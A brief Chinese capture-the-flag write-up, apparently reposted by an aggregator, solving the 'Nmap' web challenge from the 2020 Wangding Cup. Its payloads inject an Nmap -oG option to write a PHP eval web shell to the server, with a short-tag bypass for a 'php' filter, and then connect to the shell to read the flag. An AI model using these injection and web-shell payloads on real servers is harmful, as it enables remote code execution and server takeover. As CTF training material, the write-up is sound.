[网鼎杯 2020 朱雀组]Nmap
Posted mech
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[网鼎杯 2020 朱雀组]Nmap相关的知识,希望对你有一定的参考价值。
和[BUUCTF 2018]Online Tool类似,直接用里面的payload
‘ <?php @eval($_POST["hack"]);?> -oG hack.php ‘
回显hacker,经查,php被过滤,使用短标签绕过
‘ <?= @eval($_POST["hack"]);?> -oG hack.phtml ‘
成功写入
访问一下
http://b829d549-378b-494f-87e4-a74d13e0c223.node3.buuoj.cn/hack.phtml
蚁剑连接一波,在根目录下找到flag
以上是关于[网鼎杯 2020 朱雀组]Nmap的主要内容,如果未能解决你的问题,请参考以下文章